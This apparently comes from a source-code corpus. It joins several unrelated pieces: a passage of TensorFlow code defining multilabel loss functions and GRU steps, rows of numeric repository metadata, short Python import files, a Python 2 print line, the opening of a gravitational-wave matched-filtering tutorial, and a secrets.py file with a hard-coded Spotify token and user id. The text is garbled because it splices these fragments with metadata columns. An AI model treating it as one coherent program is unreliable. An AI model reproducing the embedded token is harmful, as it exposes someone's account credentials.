# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
co_label_mat_batch = tf.matmul(tf.transpose(self.input_y_multilabel),self.input_y_multilabel,a_is_sparse=True,b_is_sparse=True)
co_label_mat_batch = tf.sign(co_label_mat_batch)
label_sim_matrix = tf.multiply(co_label_mat_batch,label_sim_matrix) # only considering the label similarity of labels in the label set for this document (batch of documents).
label_sub_matrix = tf.multiply(co_label_mat_batch,label_sub_matrix)
# the sim-loss after sigmoid
sig_output = tf.sigmoid(self.logits)
vec_square = tf.multiply(sig_output,sig_output)
vec_square = tf.reduce_sum(vec_square,0) # an array of num_classes values {sum_d l_di}_i
vec_mid = tf.matmul(tf.transpose(sig_output),sig_output)
vec_rows=tf.ones([tf.size(vec_square),1])*vec_square
vec_columns=tf.transpose(vec_rows)
vec_diff=vec_rows-2*vec_mid+vec_columns # (li-lj)^2=li^2-2lilj+lj^2 # vec_diff is now a matrix = {sum_d (l_di-l_dj)^2}_i,j
vec_diff=tf.multiply(vec_diff,label_sim_matrix) #sim(T_i,T_j)*(li-lj)^2 # element-wise # using the label_sim_matrix
#vec_diff=tf.multiply(vec_diff,co_label_mat_batch) # using only tag co-occurrence
vec_final=tf.reduce_sum(vec_diff)/2 # vec_diff is symmetric
#vec_final=tf.reduce_sum(vec_diff)/2/self.num_classes/self.num_classes # vec_diff is symmetric
self.sim_loss=(vec_final/self.batch_size)*self.lambda_sim
# the sub-loss after sigmoid
pred = tf.round(sig_output)
pred_mat = tf.matmul(tf.transpose(pred),1-pred)
sub_loss = tf.multiply(pred_mat,label_sub_matrix)
self.sub_loss = self.lambda_sub * tf.reduce_sum(sub_loss) / 2. / self.batch_size
loss = self.loss_ce + self.l2_losses + self.sim_loss + self.sub_loss
return loss
# L_sub only - per batch - used in the NAACL paper
def loss_multilabel_onto_new_sub_per_batch(self, label_sub_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
## sub_loss: matrix multiplication: only using the label relations in the label set, treating same in each batch.
co_label_mat_batch = tf.matmul(tf.transpose(self.input_y_multilabel),self.input_y_multilabel,a_is_sparse=True,b_is_sparse=True)
co_label_mat_batch = tf.sign(co_label_mat_batch)
label_sub_matrix = tf.multiply(co_label_mat_batch,label_sub_matrix)
# the sub-loss after sigmoid
sig_output = tf.sigmoid(self.logits)
pred = tf.round(sig_output)
pred_mat = tf.matmul(tf.transpose(pred),1-pred)
sub_loss = tf.multiply(pred_mat,label_sub_matrix)
self.sub_loss = self.lambda_sub * tf.reduce_sum(sub_loss) / 2. / self.batch_size
self.sim_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sub_loss
return loss
# L_sub only - per document
def loss_multilabel_onto_new_sub_per_doc(self, label_sub_matrix, l2_lambda=0.0001, dynamic_sem_l2=False):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
#print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
if dynamic_sem_l2:
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
else: # not adding sim and/or sem matrices into the l2 regularisation
self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name and 'label_sub_mat' not in v.name]) * l2_lambda
## sub_loss: matrix multiplication: only using the label relations in the label set, treating same in each batch.
# only considering the similarity of co-occuring label in each labelset y_d.
sig_output = tf.sigmoid(self.logits) # get s_d from l_d
sig_list=tf.unstack(sig_output)
partitions = tf.range(self.batch_size)
num_partitions = self.batch_size
label_list = tf.dynamic_partition(self.input_y_multilabel, partitions, num_partitions, name='dynamic_unstack')
self.sub_loss = 0
for i in range(len(sig_list)): # loop over d
logit_vector = tf.expand_dims(sig_list[i],0) # s_d, shape [1,5196]
#print("logit_vector:",logit_vector)
label_vector = label_list[i] #y_d, shape [1,5196]
#print("label_vector:",label_vector)
label_vector_bool = tf.cast(label_vector, tf.bool)
#get an index vector from y_d
label_index_2d = tf.where(label_vector_bool)
#gather the s_d_true from s_d: s_d_true means the s_d values for the true labels of document d.
s_d_true = tf.expand_dims(tf.gather_nd(logit_vector,label_index_2d),0)
#calculate R(s_dj)(1-R(s_dk))
pred_d_true = tf.round(s_d_true)
pair_sub_d = tf.matmul(tf.transpose(pred_d_true),1-pred_d_true)
#gather the Sub_jk from Sub
label_index = label_index_2d[:,-1]
label_len = tf.shape(label_index)[0]
A,B=tf.meshgrid(label_index,tf.transpose(label_index))
ind_squ = tf.concat([tf.reshape(B,(-1,1)),tf.reshape(A,(-1,1))],axis=-1)
label_sub_matrix_d = tf.reshape(tf.gather_nd(label_sub_matrix,ind_squ),[label_len,label_len])
self.sub_loss = self.sub_loss + tf.reduce_sum(tf.multiply(label_sub_matrix_d,pair_sub_d))
self.sub_loss=(self.sub_loss/self.batch_size)*self.lambda_sub/2.0
self.sim_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses + self.sub_loss
return loss
def train(self):
"""based on the loss, use SGD to update parameter"""
learning_rate = tf.train.exponential_decay(self.learning_rate, self.global_step, self.decay_steps,self.decay_rate, staircase=True) #exponential_decay
#train_op = tf.contrib.layers.optimize_loss(self.loss_val, global_step=self.global_step,learning_rate=learning_rate, optimizer="Adam")
train_op = tf.contrib.layers.optimize_loss(self.loss_val, global_step=self.global_step,learning_rate=learning_rate, optimizer="Adam",clip_gradients=self.clip_gradients) #using adam here. # gradient cliping is also applied.
return train_op
def gru_single_step_word_level(self, Xt, h_t_minus_1):
"""
single step of gru for word level
:param Xt: Xt:[batch_size*num_sentences,embed_size]
:param h_t_minus_1:[batch_size*num_sentences,embed_size]
:return:
"""
# update gate: decides how much past information is kept and how much new information is added.
z_t = tf.nn.sigmoid(tf.matmul(Xt, self.W_z) + tf.matmul(h_t_minus_1,
self.U_z) + self.b_z) # z_t:[batch_size*num_sentences,self.hidden_size]
# reset gate: controls how much the past state contributes to the candidate state.
r_t = tf.nn.sigmoid(tf.matmul(Xt, self.W_r) + tf.matmul(h_t_minus_1,
self.U_r) + self.b_r) # r_t:[batch_size*num_sentences,self.hidden_size]
# candiate state h_t~
h_t_candiate = tf.nn.tanh(tf.matmul(Xt, self.W_h) +r_t * (tf.matmul(h_t_minus_1, self.U_h)) + self.b_h) # h_t_candiate:[batch_size*num_sentences,self.hidden_size]
# new state: a linear combine of pervious hidden state and the current new state h_t~
h_t = (1 - z_t) * h_t_minus_1 + z_t * h_t_candiate # h_t:[batch_size*num_sentences,hidden_size]
return h_t
# forward gru for first level: word levels
def gru_forward_word_level(self, embedded_words):
"""
:param embedded_words:[batch_size*num_sentences,sentence_length,embed_size]
:return:forward hidden state: a list.length is sentence_length, each element is [batch_size*num_sentences,hidden_size]
"""
# split embedded_words
embedded_words_splitted = tf.split(embedded_words, self.sequence_length,
axis=1) # it is a list,length is sentence_length, each element is [batch_size*num_sentences,1,embed_size]
# Now the sequence_length is the sentence_length
#print('after splitting in gru', len(embedded_words_splitted), embedded_words_splitted[0].get_shape())
embedded_words_squeeze = [tf.squeeze(x, axis=1) for x in
embedded_words_splitted] # it is a list,length is sentence_length, each element is [batch_size*num_sentences,embed_size]
# demension_1=embedded_words_squeeze[0].get_shape().dims[0]
h_t = tf.ones((self.batch_size * self.num_sentences,
self.hidden_size)) #TODO self.hidden_size h_t =int(tf.get_shape(embedded_words_squeeze[0])[0]) # tf.ones([self.batch_size*self.num_sentences, self.hidden_size]) # [batch_size*num_sentences,embed_size]
h_t_forward_list = []
for time_step, Xt in enumerate(embedded_words_squeeze): # Xt: [batch_size*num_sentences,embed_size]
h_t = self.gru_single_step_word_level(Xt,h_t) # [batch_size*num_sentences,embed_size]<------Xt:[batch_size*num_sentences,embed_size];h_t:[batch_size*num_sentences,embed_size]
h_t_forward_list.append(h_t)
return h_t_forward_list # a list,length is sentence_length, each element is [batch_size*num_sentences,hidden_size]
# backward gru for first level: word level
def gru_backward_word_level(self, embedded_words):
"""
:param embedded_words:[batch_size*num_sentences,sentence_length,embed_size]
:return: backward hidden state:a list.length is sentence_length, each element is [batch_size*num_sentences,hidden_size]
"""
# split embedded_words
embedded_words_splitted = tf.split(embedded_words, self.sequence_length,
axis=1) # it is a list,length is sentence_length, each element is [batch_size*num_sentences,1,embed_size]
embedded_words_squeeze = [tf.squeeze(x, axis=1) for x in
embedded_words_splitted] # it is a list,length is sentence_length, each element is [batch_size*num_sentences,embed_size]
embedded_words_squeeze.reverse() # it is a list,length is sentence_length, each element is [batch_size*num_sentences,embed_size]
# demension_1=int(tf.get_shape(embedded_words_squeeze[0])[0]) #h_t = tf.ones([self.batch_size*self.num_sentences, self.hidden_size])
h_t = tf.ones((self.batch_size * self.num_sentences, self.hidden_size))
h_t_backward_list = []
for time_step, Xt in enumerate(embedded_words_squeeze):
h_t = self.gru_single_step_word_level(Xt, h_t)
h_t_backward_list.append(h_t)
h_t_backward_list.reverse() #ADD 2017.06.14
return h_t_backward_list
| 73.504528
| 271
| 0.645242
| 8,420
| 56,819
| 4.074703
| 0.051069
| 0.024134
| 0.018654
| 0.028564
| 0.815063
| 0.786324
| 0.756303
| 0.738727
| 0.721531
| 0.705791
| 0
| 0.018031
| 0.246449
| 56,819
| 773
| 272
| 73.504528
| 0.783282
| 0.361288
| 0
| 0.631579
| 0
| 0
| 0.025736
| 0.004387
| 0
| 0
| 0
| 0.001294
| 0
| 1
| 0.042105
| false
| 0
| 0.006316
| 0
| 0.090526
| 0.029474
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9a0b57f9897341dbf4f0828c83a5160880aa142b
| 45
|
py
|
Python
|
src/masonite/presets/providers/__init__.py
|
cercos/masonite
|
f7f220efa7fae833683e9f07ce13c3795a87d3b8
|
[
"MIT"
] | 35
|
2018-01-08T01:20:16.000Z
|
2018-02-06T02:37:14.000Z
|
src/masonite/presets/providers/__init__.py
|
cercos/masonite
|
f7f220efa7fae833683e9f07ce13c3795a87d3b8
|
[
"MIT"
] | 55
|
2018-01-03T02:42:03.000Z
|
2018-02-06T13:35:54.000Z
|
src/masonite/presets/providers/__init__.py
|
cercos/masonite
|
f7f220efa7fae833683e9f07ce13c3795a87d3b8
|
[
"MIT"
] | 4
|
2018-01-08T13:13:14.000Z
|
2018-01-12T19:35:32.000Z
|
from .PresetsProvider import PresetsProvider
| 22.5
| 44
| 0.888889
| 4
| 45
| 10
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.97561
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d00a03ae35e78c4e8b9bc89a2cfd929cd6056ff0
| 49
|
py
|
Python
|
visigoth/common/button/__init__.py
|
visigoths/visigoth
|
c5297148209d630f6668f0e5ba3039a8856d8320
|
[
"MIT"
] | null | null | null |
visigoth/common/button/__init__.py
|
visigoths/visigoth
|
c5297148209d630f6668f0e5ba3039a8856d8320
|
[
"MIT"
] | 1
|
2021-01-26T16:55:48.000Z
|
2021-09-03T15:29:14.000Z
|
visigoth/common/button/__init__.py
|
visigoths/visigoth
|
c5297148209d630f6668f0e5ba3039a8856d8320
|
[
"MIT"
] | null | null | null |
from visigoth.common.button.button import Button
| 24.5
| 48
| 0.857143
| 7
| 49
| 6
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d00a54a193ac5ebd619bfa78b01c0915f479abc6
| 50
|
py
|
Python
|
kliep/__init__.py
|
kminoda/kliep
|
a35fb872d221267f4c842f6dcd8eaea7e8aadf08
|
[
"MIT"
] | 3
|
2019-12-11T11:51:03.000Z
|
2021-01-22T16:30:26.000Z
|
kliep/__init__.py
|
kminoda/kliep
|
a35fb872d221267f4c842f6dcd8eaea7e8aadf08
|
[
"MIT"
] | null | null | null |
kliep/__init__.py
|
kminoda/kliep
|
a35fb872d221267f4c842f6dcd8eaea7e8aadf08
|
[
"MIT"
] | 1
|
2021-08-05T01:31:25.000Z
|
2021-08-05T01:31:25.000Z
|
from .kliep import SequentialDensityRatioEstimator
| 50
| 50
| 0.92
| 4
| 50
| 11.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06
| 50
| 1
| 50
| 50
| 0.978723
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d011f906abd3922116e670a592c8959ae627b819
| 367
|
py
|
Python
|
pytracking/__init__.py
|
Jee-King/ICCV2021_Event_Frame_Tracking
|
ea86cdd331748864ffaba35f5efbb3f2a02cdb03
|
[
"MIT"
] | 15
|
2021-08-31T13:32:12.000Z
|
2022-03-24T01:55:41.000Z
|
pytracking/__init__.py
|
Jee-King/ICCV2021_Event_Frame_Tracking
|
ea86cdd331748864ffaba35f5efbb3f2a02cdb03
|
[
"MIT"
] | 2
|
2022-01-13T12:53:29.000Z
|
2022-03-31T08:14:42.000Z
|
pytracking/__init__.py
|
Jee-King/ICCV2021_Event_Frame_Tracking
|
ea86cdd331748864ffaba35f5efbb3f2a02cdb03
|
[
"MIT"
] | 2
|
2021-11-08T16:27:16.000Z
|
2021-12-08T14:24:27.000Z
|
from pytracking.libs import TensorList, TensorDict
import pytracking.libs.complex as complex
import pytracking.libs.operation as operation
import pytracking.libs.fourier as fourier
import pytracking.libs.dcf as dcf
import pytracking.libs.optimization as optimization
from pytracking.run_tracker import run_tracker
from pytracking.run_webcam import run_webcam
| 40.777778
| 52
| 0.850136
| 50
| 367
| 6.16
| 0.3
| 0.272727
| 0.324675
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111717
| 367
| 8
| 53
| 45.875
| 0.944785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d05a02ea9f45c5c36a6b68b2b6a5c8cb09897e9e
| 393
|
py
|
Python
|
secrets.py
|
KAIGWARA/spotify_api_autoplaylist
|
9dcfaa17ac04624185e92fca792bfdd9bfed8512
|
[
"MIT"
] | null | null | null |
secrets.py
|
KAIGWARA/spotify_api_autoplaylist
|
9dcfaa17ac04624185e92fca792bfdd9bfed8512
|
[
"MIT"
] | null | null | null |
secrets.py
|
KAIGWARA/spotify_api_autoplaylist
|
9dcfaa17ac04624185e92fca792bfdd9bfed8512
|
[
"MIT"
] | null | null | null |
# Make sure to fill in your spotify client_secret information
spotify_token = "BQA9rlPrf4vTVcgHe0tpH7EdWT2GXKiY0EtdkkgV0hPG0UJGCvQu-ukTCF8v_hA0_VaV8fx3aqhMlEieIZ0-5xN7l5HbiLt8HznvD_7F6REXUj73Nve9gZAnqg6rhPuSR21Jr2ANQtL7fGXuHH5bJwwJKYM8Juh-uMpuWk4CjXCZlAwrhQJN9fUXBbbtIKZhz9VMUD12DGexkDL6dRwRBlNulG_fwXoD3d-01YDf9XA44uL5dc-LHgEodTDVE_Unm5BX4XCzixQ"
spotify_user_id = "zm8gg3wodda82w1e8ic9id3gh"
| 131
| 285
| 0.931298
| 27
| 393
| 13.222222
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137566
| 0.038168
| 393
| 3
| 286
| 131
| 0.806878
| 0.150127
| 0
| 0
| 0
| 0
| 0.876877
| 0.876877
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d06e3c2cf8d7ceaba559d73d5da1d8636e04b4a3
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/module.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/module.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/module.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/69/03/97/70acedcc1cc884136e11b4af68d67ec6d0c446f896ca74736d25697acc
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 0
| 96
| 1
| 96
| 96
| 0.479167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d086ea8671a807079a01e32a806a3b8e28bfffbe
| 245
|
py
|
Python
|
asposeslidescloud/apis/__init__.py
|
rizwanniazigroupdocs/aspose-slides-cloud-python
|
f692a7082387350f80f0b389c1914e33b800a76f
|
[
"MIT"
] | null | null | null |
asposeslidescloud/apis/__init__.py
|
rizwanniazigroupdocs/aspose-slides-cloud-python
|
f692a7082387350f80f0b389c1914e33b800a76f
|
[
"MIT"
] | null | null | null |
asposeslidescloud/apis/__init__.py
|
rizwanniazigroupdocs/aspose-slides-cloud-python
|
f692a7082387350f80f0b389c1914e33b800a76f
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
# apiPackage asposeslidescloud.apis
# apiPackage
from asposeslidescloud.apis.api_base import ApiBase
from asposeslidescloud.apis.slides_api import SlidesApi
| 24.5
| 55
| 0.840816
| 30
| 245
| 6.633333
| 0.533333
| 0.316583
| 0.251256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00463
| 0.118367
| 245
| 9
| 56
| 27.222222
| 0.916667
| 0.35102
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d0a5c6f477a74ce5ed493ee391e12ea2abfd2296
| 99
|
py
|
Python
|
loopback_stream.py
|
swap-10/SignLangRecognition
|
6a6e63ba0014e26d9364ff74bdef06bb6793890b
|
[
"Apache-2.0"
] | null | null | null |
loopback_stream.py
|
swap-10/SignLangRecognition
|
6a6e63ba0014e26d9364ff74bdef06bb6793890b
|
[
"Apache-2.0"
] | null | null | null |
loopback_stream.py
|
swap-10/SignLangRecognition
|
6a6e63ba0014e26d9364ff74bdef06bb6793890b
|
[
"Apache-2.0"
] | null | null | null |
import streamlit as st
from streamlit_webrtc import webrtc_streamer
webrtc_streamer(key="Example")
| 24.75
| 44
| 0.858586
| 14
| 99
| 5.857143
| 0.642857
| 0.341463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 99
| 4
| 45
| 24.75
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0.07
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
efb73241f4180046c16555e969c5d8d2c2ec1375
| 45
|
py
|
Python
|
backend/server_delta/server_delta_app/managers/financial_transaction/__init__.py
|
dalmarcogd/challenge_ms
|
761f0a588b4c309cf6e226d306df3609c1179b4c
|
[
"MIT"
] | null | null | null |
backend/server_delta/server_delta_app/managers/financial_transaction/__init__.py
|
dalmarcogd/challenge_ms
|
761f0a588b4c309cf6e226d306df3609c1179b4c
|
[
"MIT"
] | 13
|
2020-06-05T18:26:43.000Z
|
2021-06-10T20:36:13.000Z
|
backend/server_delta/server_delta_app/managers/financial_transaction/__init__.py
|
dalmarcogd/challenge_ms
|
761f0a588b4c309cf6e226d306df3609c1179b4c
|
[
"MIT"
] | null | null | null |
from .financial_transaction_manager import *
| 22.5
| 44
| 0.866667
| 5
| 45
| 7.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4bc9791eafce244dc6008ef33fee14fce8df5e10
| 26
|
py
|
Python
|
tests/sproaster/test_child.py
|
ateska/striga
|
451b5d9421e2e5fdf49b94c8f3d76e576abc5923
|
[
"MIT"
] | null | null | null |
tests/sproaster/test_child.py
|
ateska/striga
|
451b5d9421e2e5fdf49b94c8f3d76e576abc5923
|
[
"MIT"
] | null | null | null |
tests/sproaster/test_child.py
|
ateska/striga
|
451b5d9421e2e5fdf49b94c8f3d76e576abc5923
|
[
"MIT"
] | null | null | null |
print "Hi from test child"
| 26
| 26
| 0.769231
| 5
| 26
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 26
| 1
| 26
| 26
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
ef03b2e34b514fcb5ee1594d1de7b41a2ec080d9
| 30,897
|
py
|
Python
|
gw-odw_Day2_with_Solns/Tuto_2.1_Matched_filtering_introduction with solutions.py
|
basuparth/grav_wave_workshop3
|
eb9e2ff066bb1928e5a1dbc8cd8d24344515aae4
|
[
"MIT"
] | null | null | null |
gw-odw_Day2_with_Solns/Tuto_2.1_Matched_filtering_introduction with solutions.py
|
basuparth/grav_wave_workshop3
|
eb9e2ff066bb1928e5a1dbc8cd8d24344515aae4
|
[
"MIT"
] | null | null | null |
gw-odw_Day2_with_Solns/Tuto_2.1_Matched_filtering_introduction with solutions.py
|
basuparth/grav_wave_workshop3
|
eb9e2ff066bb1928e5a1dbc8cd8d24344515aae4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# <img style="float: left;padding: 1.3em" src="https://indico.in2p3.fr/event/18313/logo-786578160.png">
#
# # Gravitational Wave Open Data Workshop #3
#
#
# ## Tutorial 2.1 PyCBC Tutorial, An introduction to matched-filtering
#
# We will be using the [PyCBC](http://github.com/ligo-cbc/pycbc) library, which is used to study gravitational-wave data, find astrophysical sources due to compact binary mergers, and study their parameters. These are some of the same tools that the LIGO and Virgo collaborations use to find gravitational waves in LIGO/Virgo data
#
# In this tutorial we will walk through how find a specific signal in LIGO data. We present matched filtering as a cross-correlation, in both the time domain and the frequency domain. In the next tutorial (2.2), we use the method as encoded in PyCBC, which is optimal in the case of Gaussian noise and a known signal model. In reality our noise is not entirely Gaussian, and in practice we use a variety of techniques to separate signals from noise in addition to the use of the matched filter.
#
# [Click this link to view this tutorial in Google Colaboratory](https://colab.research.google.com/github/gw-odw/odw-2020/blob/master/Day_2/Tuto_2.1_Matched_filtering_introduction.ipynb)
#
# Additional [examples](http://pycbc.org/pycbc/latest/html/#library-examples-and-interactive-tutorials) and module level documentation are [here](http://pycbc.org/pycbc/latest/html/py-modindex.html)
# ## Installation (un-comment and execute only if running on a cloud platform!)
# In[1]:
